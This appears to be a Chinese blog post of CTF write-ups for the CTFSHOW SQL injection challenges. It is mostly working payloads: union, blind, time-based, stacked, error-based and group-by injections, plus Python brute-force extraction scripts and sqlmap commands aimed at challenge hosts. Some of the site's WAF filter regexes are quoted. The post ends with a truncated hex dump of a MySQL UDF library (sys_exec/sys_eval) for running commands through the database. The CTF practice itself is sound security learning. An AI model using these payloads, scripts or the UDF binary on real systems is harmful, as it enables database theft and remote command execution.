MACCHIATO

WEB

WEB安全

漏洞复现

CTF

常用工具

实战

代码审计

Javaweb

后渗透

内网渗透

免杀

进程注入

权限提升

漏洞复现

靶机

vulnstack

vulnhub

Root-Me

编程语言

java

逆向

PE

逆向学习

HEVD

PWN

CTF

heap

其它

关于博客

面试

杂谈

CTFSHOW SQL注入

0x01 过滤注入

web171

1
-1' union select 1,2,(select password from ctfshow_user where username='flag')--+

web172

1
-1' union select 1,2,(select password from ctfshow_user where username='flag')--+

web173

返回包过滤flag字符串,可以通过hex编码后返回

1
-1' union select 1,2,(select hex(password) from ctfshow_user3 where username='flag')--+

web174

过滤了flag字符串和所有数字,可以通过布尔盲注得到flag

1
2
3
4
5
6
7
8
9
10
11
12
13
import requests
import string
flag = ''
table = string.digits + string.ascii_letters + '-{}'
for i in range(1, 45):
    for j in table:
        url = "http://dcfd2cf7-1f37-408e-a4d1-c834d09ac388.chall.ctf.show//api/v4.php?id="
        payload = '''1' and substr((select password from ctfshow_user4 where username="flag"),{},1)="{}"--+'''.format(i,j)
        r = requests.get(url + payload)
        if "admin" in r.text:
            flag += j
            print(flag)
            break

web175

过滤了flag字符串,所有数字和字符,可以通过时间盲注得到flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import requests
import time
import string
flag = ''
table = string.digits + string.ascii_letters + '-{}'
	for i in range(1, 45):
    for j in table:
        start = time.time()
        url = "http://e9d44ff4-cd3e-44ce-bf3e-56c04a519812.chall.ctf.show/api/v5.php?id="
        payload = '''1' and if(substr((select password from ctfshow_user5 where username="flag"),{},1)="{}",sleep(5),0)--+'''.format(i,j)
        r = requests.get(ur	l + payload)
        end = time.time()
        if end - start > 5:
            flag += j
            print(flag)
            break

web176

不知道过滤了啥,联合查询也不成功,加一个or全部出来了,因为or不需要满足前面的!=flag

1
1' or '26'--+		#里面什么数字都可以

web177

好像是过滤了空格,不知道还没有别的

1
1'/**/or/**/'26'%23

web178

好像过滤了* ,换个可以代替空格的就行了

1
1'%0bor%0b26%23

web179

过滤了%0b

1
1'%0cor%0c26%23

web180

过滤了%23

1
-1'%0cor%0cusername='flag

web181

把能当作空格的字符都过滤了

1
-1'||username='flag

web182

过滤了flag,所以payload里面不能出现flag

1
-1'||id='26

web183

1
2
3
function waf($str){
  return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\#|\x23|file|\=|or|\x7c|select|and|flag|into/i', $str);
}

过滤了上面这些,主要是过滤了flag需要思考一下,可以通过正则表达式倒着获取flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import requests
import string
import re

flag = '}'
table = string.digits + string.ascii_lowercase+ '-{}'
url = 'http://8cca6d07-095b-4ce4-a7db-6020e955dea9.chall.ctf.show/select-waf.php'
while 1:
    for i in table:
        sql = i + flag
        payload = {"tableName": "(ctfshow_user)where(pass)regexp('{}$')".format(sql)}
        r = requests.post(url, data=payload)
        if re.findall('user_count = (.)', r.text)[0] == '1':
            flag = i + flag
            print(flag)

web184

过滤规则

1
2
3
function waf($str){
  return preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\x00|\#|\x23|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);
}

过滤了where,但是没过滤空格

可以用join,至于join该怎么解释..

1
2
select count(*) from users a, users b where a.password regexp '^f';
select count(*) from users a join users b on a.password regexp '^f';

这两个语句是等价的,这样容易理解一些

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import requests
import string
import re
import binascii

def str_to_hex(string):
    str_bin = string.encode('utf-8')
    return binascii.hexlify(str_bin).decode('utf-8')

flag = '}$'
table = string.digits + string.ascii_lowercase+ '-{}'
url = 'http://59c7edd3-1a35-4c8a-b376-c1eb68e3c0b8.chall.ctf.show/select-waf.php'
while 1:
    for i in table:
        sql = i + flag
        payload = {"tableName": "ctfshow_user a join ctfshow_user b on b.pass regexp 0x{}".format(str_to_hex(sql))}
        r = requests.post(url, data=payload)
        if re.findall("user_count = (..)", r.text)[0] == '22':
            flag = i + flag
            print(flag)

web185

过滤规则

1
2
3
function waf($str){
  return preg_match('/\*|\x09|\x0a|\x0b|\x0c|\0x0d|\xa0|\x00|\#|\x23|[0-9]|file|\=|or|\x7c|select|and|flag|into|where|\x26|\'|\"|union|\`|sleep|benchmark/i', $str);
}

多了数字,可以看下面这篇文章用字母代替数字

https://xz.aliyun.com/t/7169#toc-13

这里选择用true

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import requests
import string
import re

def number(num):
    str = ''
    for i in range(0,num):
        str += "true "
    return str.strip().replace(" ", "+")

flag = 'flag{'
table = string.digits + string.ascii_lowercase+ '-{}'
url = 'http://d8fdd977-6ace-4129-87e6-b0ff6de76beb.chall.ctf.show/select-waf.php'
for a in range(6, 100):
    for i in table:
        payload = {"tableName": "ctfshow_user a join ctfshow_user b on hex(substr(b.pass,{},true)) like (hex({}))".format(number(a), number(ord(i)))}
        r = requests.post(url, data=payload)
        if re.findall("user_count = (..)", r.text)[0] == '22':
            flag += i
            print(flag)
            break

web186

脚本同上

web187

1
md5($_POST['password'], true)

看到后面的true想到md5注入

https://blog.werner.wiki/php-md5-true-sqli/

输入payload拿到flag

web188

1
username group by pass with rollup limit 1 offset 2

web189

这个真的迷惑,得到群主的提示concat后,构造出payload

主要是一直想着盲注不是一定要有and或or吗,所以就一直卡着了

1
2
3
4
5
6
7
8
9
10
11
12
13
import requests
import string
text = ''
table = string.digits + string.ascii_lowercase+ '{}-<>?'
url = "http://28fce0b8-30cc-452f-8466-ca2f86cd083c.chall.ctf.show/api/"
for i in range(1,1000):
    for s in table:
        payload = {"username": "concat('admi',if(substr(load_file('/var/www/html/api/index.php'),{},1)='{}','n','a'))".format(i, s), "password": "0"}
        r = requests.post(url, data=payload)
        if "\\u5bc6" in r.text:
            text += s
            print(text)
            break

还是有点缺陷的,这个跑的时间可能有点久毕竟是从头开始的,可以通过locate判断flag位置提高效率

1
concat('admi',if(substr(locate('flag',load_file('/var/www/html/api/index.php'),259),1,3)=266,'n','a'))

可以通过这条语句判断出flag位置从第266个字符开始..不过前面的字符串里面也存在flag,所以需要写个脚本爆破

0x02 布尔盲注

0x03 堆叠注入

web195

1
2
3
4
if(preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\#|\x23|\'|\"|select|union|or|and|\x26|\x7c|file|into/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
  }

过滤了这些

主要是空格,可以通过反引号绕过

1
2
username;update`ctfshow_user`set`pass`=0			#账号
0													#密码

还可以插入新用户

1
username;insert`ctfshow_user`values(200,1,3);

然后账号1密码3就可以得到flag了

web196

select写着过滤了但是没过滤

1
2
0;select(0)
0

得到flag

web197

过滤了update,方法同web195

web198

同web195

0x04 sqlmap

web207

过滤了空格和那些url字符,使用space2comment.py可以绕过

1
sqlmap-u http://baaf849b-977e-4c88-8bac-46197f4e38cd.chall.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql --headers="Content-Type: text/plain" --safe-url=http://baaf849b-977e-4c88-8bac-46197f4e38cd.chall.ctf.show/api/getToken.php --safe-freq=1 --tamper=space2comment.py -D ctfshow_web -T ctfshow_flaxca --dump

web208

1
$sql = "select id,username,pass from ctfshow_user where id = ('".$id."') limit 0,1;";

这题本意应该是想在sqlmap里面加上前后缀,但是sqlmap会自动判断用什么闭合,所以前后缀也可以不用加,语句和上面基本一样

1
sqlmap http://eba08ffe-2fa0-47d8-9284-8c5f9099b6a7.chall.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql --headers="Content-Type: text/plain" --safe-url=http://eba08ffe-2fa0-47d8-9284-8c5f9099b6a7.chall.ctf.show/api/getToken.php --safe-freq=1 --tamper=space2comment.py -D ctfshow_web -T ctfshow_flaxcac --dump

web209

0x05 时间盲注

0x06 其他注入

web221

limit注入

1
http://2363e5df-6f40-4a9f-96df-306493395301.chall.ctf.show/api/?page=1&limit=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,database())),1)

web222

没啥技术含量就是group by注入,感觉自己脚本写的又臭又长

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
import requests
import string

table = string.digits + string.ascii_lowercase + '{}-_'


def databases(i):
    database_name = ""
    for n in range(1, 100):
        for s in table:
            payload_database = "username having substr((select schema_name from information_schema.schemata limit {},1),{},1)='{}'".format(i, n, s)
            url = "http://1b0bab82-bae2-4e0d-90b4-5353289ad811.chall.ctf.show/api/?u={}&page=1&limit=10".format(payload_database)
            r = requests.get(url)
            if "\\u67e5\\u8be2\\u6210\\u529f" in r.text:
                database_name += str(s)
                print(database_name)
                break

def tables(i):
    table_name = ""
    for n in range(1, 100):
        for s in table:
            payload_tables = "username having substr((select table_name from information_schema.tables where table_schema='ctfshow_web' limit {},1),{},1)='{}'".format(i, n ,s)
            url = "http://1b0bab82-bae2-4e0d-90b4-5353289ad811.chall.ctf.show/api/?u={}&page=1&limit=10".format(payload_tables)
            r = requests.get(url)
            if "\\u67e5\\u8be2\\u6210\\u529f" in r.text:
                table_name += s
                print(table_name)
                break

def coluumns(i):
    column_name = ""
    for n in range(1, 100):
        for s in table:
            payload_columns = "username having substr((select column_name from information_schema.columns where table_name='ctfshow_flaga' limit {},1),{},1)='{}'".format(i, n, s)
            url = "http://1b0bab82-bae2-4e0d-90b4-5353289ad811.chall.ctf.show/api/?u={}&page=1&limit=10".format(payload_columns)
            r = requests.get(url)
            if "\\u67e5\\u8be2\\u6210\\u529f" in r.text:
                column_name += s
                print(column_name)
                break
def dump(i):
    dump_name = ""
    for n in range(1, 100):
        for s in table:
            payload_dump = "username having substr((select flagaabc from ctfshow_flaga limit {},1),{},1)='{}'".format(i, n, s)
            url = "http://1b0bab82-bae2-4e0d-90b4-5353289ad811.chall.ctf.show/api/?u={}&page=1&limit=10".format(payload_dump)
            r = requests.get(url)
            if "\\u67e5\\u8be2\\u6210\\u529f" in r.text:
                dump_name += s
                print(dump_name)
                break

if __name__ == '__main__':
    dump('0')

web223

过滤数字,和web185差不多

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
import requests
import string

table = string.digits + string.ascii_lowercase + '{}-_,'

def number(num):
    str = ''
    for i in range(0,num):
        str += "true "
    return str.strip().replace(" ", "%2b")

def databases():
    database_name = ""
    for n in range(0, 100):
        for s in table:
            payload_database = "username having hex(substr((select group_concat(schema_name) from information_schema.schemata),{},true))=hex({})".format(number(n), number(ord(s)))
            url = "http://ef236aeb-e9a1-4f89-9e25-3988b3a87ecc.chall.ctf.show/api/?u={}&page=1&limit=10".format(payload_database)
            r = requests.get(url)
            if "\\u67e5\\u8be2\\u6210\\u529f" in r.text:
                database_name += str(s)
                print(database_name)
                break

def tables():
    table_name = ""
    for n in range(1, 100):
        for s in table:
            payload_tables = "username having hex(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'),{},true))=hex({})".format(number(n) ,number(ord(s)))
            url = "http://ef236aeb-e9a1-4f89-9e25-3988b3a87ecc.chall.ctf.show/api/?u={}&page=1&limit=10".format(payload_tables)
            r = requests.get(url)
            if "\\u67e5\\u8be2\\u6210\\u529f" in r.text:
                table_name += s
                print(table_name)
                break

def coluumns():
    column_name = ""
    for n in range(0, 100):
        for s in table:
            payload_columns = "username having hex(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagas'),{},true))=hex({})".format(number(n), number(ord(s)))
            url = "http://ef236aeb-e9a1-4f89-9e25-3988b3a87ecc.chall.ctf.show/api/?u={}&page=1&limit=10".format(payload_columns)
            r = requests.get(url)
            if "\\u67e5\\u8be2\\u6210\\u529f" in r.text:
                column_name += s
                print(column_name)
                break
def dump():
    dump_name = ""
    for n in range(0, 100):
        for s in table:
            payload_dump = "username having hex(substr((select group_concat(flagasabc) from ctfshow_flagas),{},true))=hex({})".format(number(n), number(ord(s)))
            url = "http://f6772ccc-579a-4c5d-b64b-f7f2b2dea7dc.chall.ctf.show/api/?u={}&page=1&limit=10".format(payload_dump)
            r = requests.get(url)
            if "\\u67e5\\u8be2\\u6210\\u529f" in r.text:
                dump_name += s
                print(dump_name)
                break

if __name__ == '__main__':
    dump()

0x07 高级堆叠

web225

1
ctfshow';handler ctfshow_flagasa open;handler ctfshow_flagasa read first;

和随便注那题差不多

0x08 显错注入

web244

1
2
http://1808ca70-ff68-4c8f-a35a-3b128e78527c.chall.ctf.show/api/?id=1' and (updatexml(1,concat(0x7e,(select substr(flag,1,100) from ctfshow_flag limit 0,1),0x7e),1))--+&page=1&limit=10
http://1808ca70-ff68-4c8f-a35a-3b128e78527c.chall.ctf.show/api/?id=1' and (updatexml(1,concat(0x7e,(select substr(flag,26,100) from ctfshow_flag limit 0,1),0x7e),1))--+&page=1&limit=10

显错注入输出有字符限制,截取字符串拼接即可

web245

禁用了updatexml,换个函数就行了

1
2
http://c0a9aaad-b73c-4b50-887f-7d9683fecd74.chall.ctf.show/api/?id=1' and (extractvalue(1,concat(0x7e,(select (substr(flag1,1,100)) from ctfshow_flagsa limit 0,1),0x7e)))--+&page=1&limit=10
http://c0a9aaad-b73c-4b50-887f-7d9683fecd74.chall.ctf.show/api/?id=1' and (extractvalue(1,concat(0x7e,(select (substr(flag1,30,100)) from ctfshow_flagsa limit 0,1),0x7e)))--+&page=1&limit=10

web246

禁用了updatexml,extractvalue

用floor注入

1
http://ef297c1b-41c4-4110-af27-6e9c0bc7436e.chall.ctf.show/api/?id=1%27%20and%20(select%201%20from%20(select%20count(*),concat((select%20flag2%20from%20ctfshow_flags),floor%20(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)--+&page=1&limit=10

floor报错的长度是64所以一次就够了,但是报错出来的字符后面会多个1,记得报库名表名列名的时候去掉

web247

web248

这题和sqlmapudf执行命令差不多,其实过滤也没有过滤到很严格,就是没想到这题可以堆叠..不过话说回来udf本来就需要堆叠创建新函数,还是题目做的少了..

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
import requests

payload = []
text = ["a", "b", "c", "d", "e"]
udf = "7F454C4602010100000000000000000003003E0001000000800A000000000000400000000000000058180000000000000000000040003800060040001C0019000100000005000000000000000000000000000000000000000000000000000000C414000000000000C41400000000000000002000000000000100000006000000C814000000000000C814200000000000C8142000000000004802000000000000580200000000000000002000000000000200000006000000F814000000000000F814200000000000F814200000000000800100000000000080010000000000000800000000000000040000000400000090010000000000009001000000000000900100000000000024000000000000002400000000000000040000000000000050E574640400000044120000000000004412000000000000441200000000000084000000000000008400000000000000040000000000000051E5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000040000001400000003000000474E5500D7FF1D94176ABA0C150B4F3694D2EC995AE8E1A8000000001100000011000000020000000700000080080248811944C91CA44003980468831100000013000000140000001600000017000000190000001C0000001E000000000000001F00000000000000200000002100000022000000230000002400000000000000CE2CC0BA673C7690EBD3EF0E78722788B98DF10ED971581CA868BE12BBE3927C7E8B92CD1E7066A9C3F9BFBA745BB073371974EC4345D5ECC5A62C1CC3138AFF3B9FD4A0AD73D1C50B5911FEAB5FBE1200000000000000000000000000000000000000000000000000000000000000000300090088090000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000CD00000012000000000000000000000000000000000000001E0100001200000000000000000000000000000000000000620100001200000000000000000000000000000000000000E30000001200000000000000000000000000000000000000B90000001200000000000000000000000000000000000000680100001200000000000000000000000000000000000000160000002200000000000000000000000000000000000000540000001200000000000000000000000000000000000000F00000001200000000000000000000000000000000000000B200000012000000000000000000000000000000000000005A01000012000000000000000000000000000000000000005201000012000000000000000000000000000000000000004C0100001200000000000000000000000000000000000000E800000012000B00D10D000000000000D1000000000000003301000012000B00A90F0000000000000A000000000000001000000012000C00481100000000000000000000000000007800000012000B009F0B0000000000004C00000000000000FF0000001200090088090000000000000000000000000000800100001000F1FF101720000000000000000000000000001501000012000B00130F0000000000002F000000000000008C0100001000F1FF201720000000000000000000000000009B00000012000B00480C0000000000000A000000000000002501000012000B00420F0000000000006700000000000000AA00000012000B00520C00000000000063000000000000005B00000012000B00950B0000000000000A000000000000008E00000012000B00EB0B0000000000005D00000000000000790100001000F1FF101720000000000000000000000000000501000012000B00090F0000000000000A00000000000000C000000012000B00B50C000000000000F100000000000000F700000012000B00A20E00000000000067000000000000003900000012000B004C0B0000000000004900000000000000D400000012000B00A60D0000000000002B000000000000004301000012000B00B30F0000000000005501000000000000005F5F676D6F6E5F73746172745F5F005F66696E69005F5F6378615F66696E616C697A65005F4A765F5265676973746572436C6173736573006C69625F6D7973716C7564665F7379735F696E666F5F696E6974006D656D637079006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F007379735F6765745F696E6974007379735F6765745F6465696E6974007379735F67657400676574656E76007374726C656E007379735F7365745F696E6974006D616C6C6F63007379735F7365745F6465696E69740066726565007379735F73657400736574656E76007379735F657865635F696E6974007379735F657865635F6465696E6974007379735F657865630073797374656D007379735F6576616C5F696E6974007379735F6576616C5F6465696E6974007379735F6576616C00706F70656E007265616C6C6F63007374726E6370790066676574730070636C6F7365006C6962632E736F2E36005F6564617461005F5F6273735F7374617274005F656E6400474C4942435F322E322E3500000000000000000000020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001006F0100001000000000000000751A6909000002009101000000000000F0142000000000000800000000000000F0142000000000007816200000000000060000000200000000000000000000008016200000000000060000000300000000000000000000008816200000000000060000000A0000000000000000000000A81620000000000007000000040000000000000000000000B01620000000000007000000050000000000000000000000B81620000000000007000000060000000000000000000000C01620000000000007000000070000000000000000000000C81620000000000007000000080000000000000000000000D01620000000000007000000090000000000000000000000D816200000000000070000000A0000000000000000000000E016200000000000070000000B0000000000000000000000E816200000000000070000000C0000000000000000000000F016200000000000070000000D0000000000000000000000F816200000000000070000000E00000000000000000000000017200000000000070000000F00000000000000000000000817200000000000070000001000000000000000000000004883EC08E8EF000000E88A010000E8750700004883C408C3FF35F20C2000FF25F40C20000F1F4000FF25F20C20006800000000E9E0FFFFFFFF25EA0C20006801000000E9D0FFFFFFFF25E20C20006802000000E9C0FFFFFFFF25DA0C20006803000000E9B0FFFFFFFF25D20C20006804000000E9A0FFFFFFFF25CA0C20006805000000E990FFFFFFFF25C20C20006806000000E980FFFFFFFF25BA0C20006807000000E970FFFFFFFF25B20C20006808000000E960FFFFFFFF25AA0C20006809000000E950FFFFFFFF25A20C2000680A000000E940FFFFFFFF259A0C2000680B000000E930FFFFFFFF25920C2000680C000000E920FFFFFF4883EC08488B05ED0B20004885C07402FFD04883C408C390909090909090909055803D680C2000004889E5415453756248833DD00B200000740C488D3D2F0A2000E84AFFFFFF488D1D130A20004C8D25040A2000488B053D0C20004C29E348C1FB034883EB014839D873200F1F4400004883C0014889051D0C200041FF14C4488B05120C20004839D872E5C605FE0B2000015B415CC9C3660F1F84000000000048833DC009200000554889E5741A488B054B0B20004885C0740E488D3DA7092000C9FFE00F1F4000C9C39090554889E54883EC3048897DE8488975E0488955D8488B45E08B0085C07421488D0DE7050000488B45D8BA320000004889CE4889C7E89BFEFFFFC645FF01EB04C645FF000FB645FFC9C3554889E548897DF8C9C3554889E54883EC3048897DF8488975F0488955E848894DE04C8945D84C894DD0488D0DCA050000488B45E8BA1F0000004889CE4889C7E846FEFFFF488B45E048C7001E000000488B45E8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F801751C488B45F0488B40088B0085C0750E488B45F8C60001B800000000EB20488D0D83050000488B45E8BA2B0000004889CE4889C7E8DFFDFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC4048897DE8488975E0488955D848894DD04C8945C84C894DC0488B45E0488B4010488B004889C7E8BBFDFFFF488945F848837DF8007509488B45C8C60001EB16488B45F84889C7E84BFDFFFF4889C2488B45D0488910488B45F8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F8027425488D0D05050000488B45E8BA1F0000004889CE4889C7E831FDFFFFB801000000E9AB000000488B45F0488B40088B0085C07422488D0DF2040000488B45E8BA280000004889CE4889C7E8FEFCFFFFB801000000EB7B488B45F0488B40084883C004C70000000000488B45F0488B4018488B10488B45F0488B40184883C008488B00488D04024883C0024889C7E84BFCFFFF4889C2488B45F848895010488B45F8488B40104885C07522488D0DA4040000488B45E8BA1A0000004889CE4889C7E888FCFFFFB801000000EB05B800000000C9C3554889E54883EC1048897DF8488B45F8488B40104885C07410488B45F8488B40104889C7E811FCFFFFC9C3554889E54883EC3048897DE8488975E0488955D848894DD0488B45E8488B4010488945F0488B45E0488B4018488B004883C001480345F0488945F8488B45E0488B4018488B10488B45E0488B4010488B08488B45F04889CE4889C7E8EFFBFFFF488B45E0488B4018488B00480345F0C60000488B45E0488B40184883C008488B10488B45E0488B40104883C008488B08488B45F84889CE4889C7E8B0FBFFFF488B45E0488B40184883C008488B00480345F8C60000488B4DF8488B45F0BA010000004889CE4889C7E892FBFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0DC2020000488B45D8BA2B0000004889CE4889C7E81EFBFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC2048897DF8488975F0488955E848894DE0488B45F0488B4010488B004889C7E882FAFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0D22020000488B45D8BA2B0000004889CE4889C7E87EFAFFFFB801000000C9C3554889E548897DF8C9C3554889E54881EC500400004889BDD8FBFFFF4889B5D0FBFFFF488995C8FBFFFF48898DC0FBFFFF4C8985B8FBFFFF4C898DB0FBFFFFBF01000000E8BEF9FFFF488985C8FBFFFF48C745F000000000488B85D0FBFFFF488B4010488B00488D352C0200004889C7E852FAFFFF488945E8EB63488D85E0FBFFFF4889C7E8BDF9FFFF488945F8488B45F8488B55F04801C2488B85C8FBFFFF4889D64889C7E80CFAFFFF488985C8FBFFFF488D85E0FBFFFF488B55F0488B8DC8FBFFFF4801D1488B55F84889C64889CFE8D1F9FFFF488B45F8480145F0488B55E8488D85E0FBFFFFBE000400004889C7E831F9FFFF4885C07580488B45E84889C7E850F9FFFF488B85C8FBFFFF0FB60084C0740A4883BDC8FBFFFF00750C488B85B8FBFFFFC60001EB2B488B45F0488B95C8FBFFFF488D0402C60000488B85C8FBFFFF4889C7E8FBF8FFFF488B95C0FBFFFF488902488B85C8FBFFFFC9C39090909090909090554889E5534883EC08488B05A80320004883F8FF7419488D1D9B0320000F1F004883EB08FFD0488B034883F8FF75F14883C4085BC9C390904883EC08E84FF9FFFF4883C408C300004E6F20617267756D656E747320616C6C6F77656420287564663A206C69625F6D7973716C7564665F7379735F696E666F29000000000000006C69625F6D7973716C7564665F7379732076657273696F6E20302E302E33000045787065637465642065786163746C79206F6E6520737472696E67207479706520706172616D6574657200000000000045787065637465642065786163746C792074776F20617267756D656E74730000457870656374656420737472696E67207479706520666F72206E616D6520706172616D6574657200436F756C64206E6F7420616C6C6F63617465206D656D6F7279007200011B033B800000000F00000008F9FFFF9C00000051F9FFFFBC0000005BF9FFFFDC000000A7F9FFFFFC00000004FAFFFF1C0100000EFAFFFF3C01000071FAFFFF5C01000062FBFFFF7C0100008DFBFFFF9C0100005EFCFFFFBC010000C5FCFFFFDC010000CFFCFFFFFC010000FEFCFFFF1C02000065FDFFFF3C0200006FFDFFFF5C0200001400000000000000017A5200017810011B0C0708900100001C0000001C00000064F8FFFF4900000000410E108602430D0602440C070800001C0000003C0000008DF8FFFF0A00000000410E108602430D06450C07080000001C0000005C00000077F8FFFF4C00000000410E108602430D0602470C070800001C0000007C000000A3F8FFFF5D00000000410E108602430D0602580C070800001C0000009C000000E0F8FFFF0A00000000410E108602430D06450C07080000001C000000BC000000CAF8FFFF6300000000410E108602430D06025E0C070800001C000000DC0000000DF9FFFFF100000000410E108602430D0602EC0C070800001C000000FC000000DEF9FFFF2B00000000410E108602430D06660C07080000001C0000001C010000E9F9FFFFD100000000410E108602430D0602CC0C070800001C0000003C0100009AFAFFFF6700000000410E108602430D0602620C070800001C0000005C010000E1FAFFFF0A00000000410E108602430D06450C07080000001C0000007C010000CBFAFFFF2F00000000410E108602430D066A0C07080000001C0000009C010000DAFAFFFF6700000000410E108602430D0602620C070800001C000000BC01000021FBFFFF0A00000000410E108602430D06450C07080000001C000000DC0100000BFBFFFF5501000000410E108602430D060350010C0708000000000000000000FFFFFFFFFFFFFFFF0000000000000000FFFFFFFFFFFFFFFF00000000000000000000000000000000F01420000000000001000000000000006F010000000000000C0000000000000088090000000000000D000000000000004811000000000000F5FEFF6F00000000B8010000000000000500000000000000E805000000000000060000000000000070020000000000000A000000000000009D010000000000000B000000000000001800000000000000030000000000000090162000000000000200000000000000380100000000000014000000000000000700000000000000170000000000000050080000000000000700000000000000F0070000000000000800000000000000600000000000000009000000000000001800000000000000FEFFFF6F00000000D007000000000000FFFFFF6F000000000100000000000000F0FFFF6F000000008607000000000000F9FFFF6F0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000F81420000000000000000000000000000000000000000000B609000000000000C609000000000000D609000000000000E609000000000000F609000000000000060A000000000000160A000000000000260A000000000000360A000000000000460A000000000000560A000000000000660A000000000000760A0000000000004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D3429004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D31372900002E73796D746162002E737472746162002E7368737472746162002E6E6F74652E676E752E6275696C642D6964002E676E752E68617368002E64796E73796D002E64796E737472002E676E752E76657273696F6E002E676E752E76657273696F6E5F72002E72656C612E64796E002E72656C612E706C74002E696E6974002E74657874002E66696E69002E726F64617461002E65685F6672616D655F686472002E65685F6672616D65002E63746F7273002E64746F7273002E6A6372002E646174612E72656C2E726F002E64796E616D6963002E676F74002E676F742E706C74002E627373002E636F6D6D656E7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001B0000000700000002000000000000009001000000000000900100000000000024000000000000000000000000000000040000000000000000000000000000002E000000F6FFFF6F0200000000000000B801000000000000B801000000000000B400000000000000030000000000000008000000000000000000000000000000380000000B000000020000000000000070020000000000007002000000000000780300000000000004000000020000000800000000000000180000000000000040000000030000000200000000000000E805000000000000E8050000000000009D0100000000000000000000000000000100000000000000000000000000000048000000FFFFFF6F0200000000000000860700000000000086070000000000004A0000000000000003000000000000000200000000000000020000000000000055000000FEFFFF6F0200000000000000D007000000000000D007000000000000200000000000000004000000010000000800000000000000000000000000000064000000040000000200000000000000F007000000000000F00700000000000060000000000000000300000000000000080000000000000018000000000000006E000000040000000200000000000000500800000000000050080000000000003801000000000000030000000A000000080000000000000018000000000000007800000001000000060000000000000088090000000000008809000000000000180000000000000000000000000000000400000000000000000000000000000073000000010000000600000000000000A009000000000000A009000000000000E0000000000000000000000000000000040000000000000010000000000000007E000000010000000600000000000000800A000000000000800A000000000000C80600000000000000000000000000001000000000000000000000000000000084000000010000000600000000000000481100000000000048110000000000000E000000000000000000000000000000040000000000000000000000000000008A00000001000000020000000000000058110000000000005811000000000000EC0000000000000000000000000000000800000000000000000000000000000092000000010000000200000000000000441200000000000044120000000000008400000000000000000000000000000004000000000000000000000000000000A0000000010000000200000000000000C812000000000000C812000000000000FC01000000000000000000000000000008000000000000000000000000000000AA000000010000000300000000000000C814200000000000C8140000000000001000000000000000000000000000000008000000000000000000000000000000B1000000010000000300000000000000D814200000000000D8140000000000001000000000000000000000000000000008000000000000000000000000000000B8000000010000000300000000000000E814200000000000E8140000000000000800000000000000000000000000000008000000000000000000000000000000BD000000010000000300000000000000F014200000000000F0140000000000000800000000000000000000000000000008000000000000000000000000000000CA000000060000000300000000000000F814200000000000F8140000000000008001000000000000040000000000000008000000000000001000000000000000D3000000010000000300000000000000781620000000000078160000000000001800000000000000000000000000000008000000000000000800000000000000D8000000010000000300000000000000901620000000000090160000000000008000000000000000000000000000000008000000000000000800000000000000E1000000080000000300000000000000101720000000000010170000000000001000000000000000000000000000000008000000000000000000000000000000E60000000100000030000000000000000000000000000000101700000000000059000000000000000000000000000000010000000000000001000000000000001100000003000000000000000000000000000000000000006917000000000000EF00000000000000000000000000000001000000000000000000000000000000010000000200000000000000000000000000000000000000581F00000000000068070000000000001B0000002C00000008000000000000001800000000000000090000000300000000000000000000000000000000000000C02600000000000042030000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000100900100000000000000000000000000000000000003000200B80100000000000000000000000000000000000003000300700200000000000000000000000000000000000003000400E80500000000000000000000000000000000000003000500860700000000000000000000000000000000000003000600D00700000000000000000000000000000000000003000700F00700000000000000000000000000000000000003000800500800000000000000000000000000000000000003000900880900000000000000000000000000000000000003000A00A00900000000000000000000000000000000000003000B00800A00000000000000000000000000000000000003000C00481100000000000000000000000000000000000003000D00581100000000000000000000000000000000000003000E00441200000000000000000000000000000000000003000F00C81200000000000000000000000000000000000003001000C81420000000000000000000000000000000000003001100D81420000000000000000000000000000000000003001200E81420000000000000000000000000000000000003001300F01420000000000000000000000000000000000003001400F81420000000000000000000000000000000000003001500781620000000000000000000000000000000